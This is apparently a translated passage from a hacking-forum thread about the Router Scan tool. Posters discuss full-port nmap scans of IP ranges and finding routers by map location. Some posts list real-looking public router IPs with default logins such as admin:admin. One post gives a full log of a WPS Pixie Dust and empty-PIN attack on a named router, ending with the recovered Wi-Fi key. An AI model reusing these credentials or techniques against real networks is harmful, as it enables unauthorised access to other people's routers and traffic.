Router Scan program

Discussion in 'Wireless technologies/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder

    Joined:
    11 Dec 2010
    Messages:
    4,261
    Likes Received:
    8,435
    Reputations:
    111
    You'll probably have to investigate in depth with Nmap; the ports may be non-standard.
    These addresses usually belong to internal local networks, so they will differ.
     
  2. tayerz

    tayerz Member

    Joined:
    31 May 2017
    Messages:
    67
    Likes Received:
    7
    Reputations:
    0
    Which ports would you recommend?
     
  3. binarymaster

    binarymaster Elder

    Well, I usually don't know in advance which ports, so I scan all possible ones.
    Code:
    nmap -p 0-65535 -T4 -v 100.104.0.0/16
    Statistics for the region are sparse, so it's hard to make assumptions.

    [​IMG]
     
    Alexmeh likes this.
  4. tayerz

    tayerz Member

    Could you explain it in general terms? I'm not getting half of this ;)
     
  5. binarymaster

    binarymaster Elder

    Well, in general terms, Nmap is a separate program for scanning IP networks.
     
  6. tayerz

    tayerz Member

    Got it. I'll study and try out Nmap.
    Thanks :)
     
  7. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    69
    Reputations:
    0
    So what do I actually do next if the router is found in Locate AP on map? I.e. it shows up on Google Maps, with the street, the building and so on, and it shows the longitude and latitude. I entered those values into 3 WIFI at the minimum, i.e. 0.1, and it shows several ranges or just one; if I take more (0.3-0.5), it already shows a ton of ranges. So how do I pin down exactly the range for the specific router that was found?
     
  8. binarymaster

    binarymaster Elder

    It will be hard to pin down exactly. But the smaller the radius, the better - you need to pick a happy medium between the radius and a small number of ranges.
    He's here! :D
     
    ms13 and Payer like this.
  9. СЕРЖ32

    СЕРЖ32 Member

    yeah.... I'm here, I'm just here keeping an eye on you))
     
    ms13, Payer and binarymaster like this.
  10. СЕРЖ32

    СЕРЖ32 Member

    well, what if port 80 is turned off on the access point, what's the point of scanning then.... or can this router be detected on some other ports?
     
  11. binarymaster

    binarymaster Elder

    Sometimes you can on others - 8080, 1080, 161.

    But it also happens that access from the WAN is closed altogether.
     
  12. СЕРЖ32

    СЕРЖ32 Member

    well, I already have 80, 8080 and 1080 entered, 161 isn't. What is that port anyway, it's not a web interface, is it...
     
  13. russstand

    russstand Banned

    Joined:
    5 Jan 2013
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    this is the answer I get :(
     
  14. binarymaster

    binarymaster Elder

    Web interfaces do turn up there, as practice shows.
    Well, it's all logical:

    https://forum.antichat.ru/posts/4143320 (reply 5)
     
    Payer likes this.
  15. gurgen1

    gurgen1 Member

    Joined:
    25 Sep 2017
    Messages:
    36
    Likes Received:
    17
    Reputations:
    0
  16. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    102
    Likes Received:
    96
    Reputations:
    0
    31.181.99.197:80 super:super doesn't parse. It returns super:super:1K6ACAEO Realtek (QTECH QBR-1), or Seems to be Realtek Wireless Access Point, without authorization.
    Do you need an Archer C60 sample? It has the same firmware as the C59, which has already been added.
     
    #4856 Pebenok70, 1 Nov 2017
    Last edited: 1 Nov 2017
  17. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,073
    Likes Received:
    3,416
    Reputations:
    72
    You come across all sorts of "crafty" kids of users.
    Thinks he can hide from RouterScan?
    Oh no, you won't get away. Come here, you.

    [​IMG]
    And here's at least this much use from the Avira antivirus: a 500 MB VPN
     
    dragonking, USER_X, sha9 and 8 others like this.
  18. alaa ali

    alaa ali New Member

    Joined:
    2 Nov 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Hello world,
    I want to add a list of IPs : ports to routerscan
    example :-
    127.0.0.1:80
    127.0.0.2:779
    127.0.0.3:999
    I have many ports, please help me
     
  19. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    641
    Likes Received:
    931
    Reputations:
    7
    Please add a MAC vulnerable to the empty PIN.
    ESSID: MTSRouter_4971D2
    BSSID:
    Code:
    94:A7:B7:49:71:D2
    Code:
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H298N
    [*] Model Number: ZXHN H298N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] Received WPS Message M3.
    [*] This AP is potentially vulnerable to the "empty string" pin.
    [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
    [*] Also in this case the pin can have two same halfs (e.g. 00000000).
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: 0000
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Audit stopped.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Skipping pin "" (wrong first half)
    [*] Trying pin "12345670"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0FF797195E62796710FF59DD4232C3CD
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H298N
    [*] Model Number: ZXHN H298N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] R-Nonce: 04C05DB3C6691D0E4956EA99081E638D
    [*] PKR: 4BF226590448CBD43450681867CD706FE19E156B04502F61290DC1192DA8038226D48B36019B486340499E1BCF498AE039F0CFE8DB736B62EC603F4FB18F33481FB1E0EF6BC7520146B1DC709CD93A5E886524B1F2E5C7C4A6BBA7C19763DC47C51DF6CE9B0619C1AD10B65221BF5878FCD186321F7C36D50D17810E93352167083DB63AC61E3FF779FC0A98C5BD370C4D83CBBFDD775471C6953278C4868993A83D28A64E69F4D6A7626904F034F64306943AD67FCC74FEDFAD1E2D10C42B4B
    [*] AuthKey: EBF1376FA22F3B8963235679817DDE15C0D21169F78E4B8336F6EBE6DBDE2003
    [*] Received WPS Message M3.
    [*] E-Hash1: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
    [*] E-Hash2: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: 1234
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Received Identity Request.
    [-] Session timed out.
    [*] Starting Pixie Dust attack...
    [*] Mode: 3 (RTL819x)
    [*] PSK1: 97FC09F3DC0F2CBEAA59BFCCA4E98902
    [*] PSK2: 422D7C5B3D86D90EE5A9BB1BFEC4C19F
    [*] E-S1: 0FF797195E62796710FF59DD4232C3CD
    [*] E-S2: 0FF797195E62796710FF59DD4232C3CD
    [+] WPS PIN: <empty>
    [*] Reconnecting...
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 690A2B5316A0E61B45D4FCD5127CF1F3
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: C6FB90173F7B221CC91DA3A396E0E9A4
    [*] PKR: 200B2F3C19FDFFB0FC39A5FF7693AA64DA61DB5763CA23C5ABA856E4AB0CD832A1922D327A3F6F3A54E02984A17C2BE3965F01C90E8E3E80A28E3D3E448AEFB604E6B295304A8DEDADA185410E6066C8C96E93EC2EE95B491485086EF1BF3B51474A2AF7AD05FBD2269AB879378BF3402446F9347607D96E20452ADFBBF80EBC58E177AA2D8A9DAF4C267C55C876B9E28C0D6105928A86F30F1E36A10877D7D7515165616AD3C481F609B6DA9803ED103A3FD6CCB714A8B09325849FB1C580FD
    [*] AuthKey: E0B5926E675130CFDD8301B92DFC646981BD94171188716B39A545C8E119C2F9
    [*] Received WPS Message M1.
    [*] E-Nonce: 690A2B5316A0E61B45D4FCD5127CF1F3
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: C6FB90173F7B221CC91DA3A396E0E9A4
    [*] PKR: 200B2F3C19FDFFB0FC39A5FF7693AA64DA61DB5763CA23C5ABA856E4AB0CD832A1922D327A3F6F3A54E02984A17C2BE3965F01C90E8E3E80A28E3D3E448AEFB604E6B295304A8DEDADA185410E6066C8C96E93EC2EE95B491485086EF1BF3B51474A2AF7AD05FBD2269AB879378BF3402446F9347607D96E20452ADFBBF80EBC58E177AA2D8A9DAF4C267C55C876B9E28C0D6105928A86F30F1E36A10877D7D7515165616AD3C481F609B6DA9803ED103A3FD6CCB714A8B09325849FB1C580FD
    [*] AuthKey: E0B5926E675130CFDD8301B92DFC646981BD94171188716B39A545C8E119C2F9
    [*] Received WPS Message M3.
    [*] E-Hash1: D9A4A73158C4CF708D01A5491993D6B78A8EE5F1516EAAABE339BD7B828E7C69
    [*] E-Hash2: D9A4A73158C4CF708D01A5491993D6B78A8EE5F1516EAAABE339BD7B828E7C69
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Session timed out.
    [+] WPS PIN: <empty>
    [+] SSID: MTSRouter_4971D2
    [+] Key: v5h3pruu
    [+] Key Index: 1
    [*] Audit stopped.
    
    I messed up a bit while experimenting.
    Could the MAC of the device being audited be added to the log? :)
    Sometimes in the rush (if there are many devices in progress), you can forget to save it (the MAC).
     
    sha9, Mednik, CRACK211 and 3 others like this.
  20. Pebenok70

    Pebenok70 Member

    FAST Wireless N Router FWR310 178.237.183.87:80 admin:admin doesn't parse for me. Please check.
     